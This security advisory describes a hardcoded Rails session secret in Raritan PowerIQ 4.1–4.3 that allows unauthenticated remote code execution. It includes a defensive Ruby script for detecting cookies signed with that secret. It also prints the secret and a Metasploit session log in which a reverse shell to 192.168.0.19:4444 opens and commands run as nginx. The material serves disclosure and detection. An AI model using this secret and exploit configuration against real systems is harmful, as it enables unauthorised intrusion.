Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web interface with a hardcoded session secret of 8e238c9702412d475a4c44b7726a0537.
This can be used to achieve unauthenticated remote code execution as the nginx user on vulnerable systems.
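As an added defensive check (not part of the advisory or of the Metasploit module), the following Ruby script flags session cookies in captured Set-Cookie lines whose HMAC verifies under the hardcoded PowerIQ secret, which is how an operator can confirm an exposed install is still using it. The log lines are constructed, the secret list contains only the advisory's value, and it handles the Rails 2/3 signed-cookie format only, not Rails 4 encrypted cookies.

```ruby
require 'openssl'
require 'base64'
require 'cgi'

# Secrets known to be hardcoded in shipped products. The entry below is the
# PowerIQ 4.1-4.3 value from the advisory; extend the list as others are found.
KNOWN_HARDCODED_SECRETS = ['8e238c9702412d475a4c44b7726a0537'].freeze

# Constant-time string comparison, so the scanner does not leak timing on signatures.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# A Rails 2/3 signed session cookie is "<base64 session>--<hex HMAC>".
# Returns the known secret the cookie verifies under, or nil if none match.
def hardcoded_secret_for(cookie, secrets = KNOWN_HARDCODED_SECRETS, digest = 'SHA1')
  data, sig = cookie.to_s.split('--', 2)
  return nil if data.nil? || sig.nil? || sig.empty?
  secrets.find { |s| secure_equal?(OpenSSL::HMAC.hexdigest(digest, s, data), sig) }
end

# Scan captured Set-Cookie lines (from a proxy or web-server log) and return
# [line, secret] pairs for sessions signed with a known hardcoded secret.
def flag_hardcoded_sessions(lines, cookie_name = '_session_id')
  lines.each_with_object([]) do |line, hits|
    raw = line[/#{Regexp.escape(cookie_name)}=([^;\s]+)/, 1]
    next unless raw
    secret = hardcoded_secret_for(CGI.unescape(raw))
    hits << [line, secret] if secret
  end
end

# Constructed sample: the cookie a server running with `secret` would issue for a
# placeholder session (real cookies carry a Marshal-serialised session hash).
def constructed_sample_cookie(secret)
  session = Base64.strict_encode64('constructed-session-placeholder')
  "#{session}--#{OpenSSL::HMAC.hexdigest('SHA1', secret, session)}"
end

# Constructed log lines: one vulnerable host, one with a per-install secret, one unrelated.
SAMPLE_LOG = [
  "Set-Cookie: _session_id=#{CGI.escape(constructed_sample_cookie(KNOWN_HARDCODED_SECRETS.first))}; path=/; HttpOnly",
  "Set-Cookie: _session_id=#{CGI.escape(constructed_sample_cookie('properly-random-per-install-secret'))}; path=/; HttpOnly",
  'Set-Cookie: other=1; path=/'
].freeze

if __FILE__ == $PROGRAM_NAME
  flag_hardcoded_sessions(SAMPLE_LOG).each { |line, secret| puts "HARDCODED SECRET #{secret}: #{line}" }
end
```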
msf exploit(rails_secret_deserialization) > show options

Module options (exploit/multi/http/rails_secret_deserialization):

   Name             Current Setting                           Required  Description
   ----             ---------------                           --------  -----------
   COOKIE_NAME                                                no        The name of the session cookie
   DIGEST_NAME      SHA1                                      yes       The digest type used to HMAC the session cookie
   HTTP_METHOD      GET                                       yes       The HTTP request method (GET, POST, PUT typically work)
   Proxies                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RAILSVERSION     3                                         yes       The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4)
   RHOST            192.168.0.20                              yes       The target address
   RPORT            443                                       yes       The target port
   SALTENC          BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw==  yes       The encrypted cookie salt
   SALTSIG          42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8  yes       The signed encrypted cookie salt
   SECRET           8e238c9702412d475a4c44b7726a0537          yes       The secret_token (Rails3) or secret_key_base (Rails4) of the application (needed to sign the cookie)
   TARGETURI        /login/login                              yes       The path to a vulnerable Ruby on Rails application
   VALIDATE_COOKIE  true                                      no        Only send the payload if the session cookie is validated
   VHOST                                                      no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(rails_secret_deserialization) > exploit

[*] Started reverse handler on 192.168.0.19:4444
[*] Checking for cookie
[*] Adjusting cookie name to _session_id
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _session_id
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729) at 2015-03-11 19:45:20 -0500

id
uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users)
Authored by Brandon Perry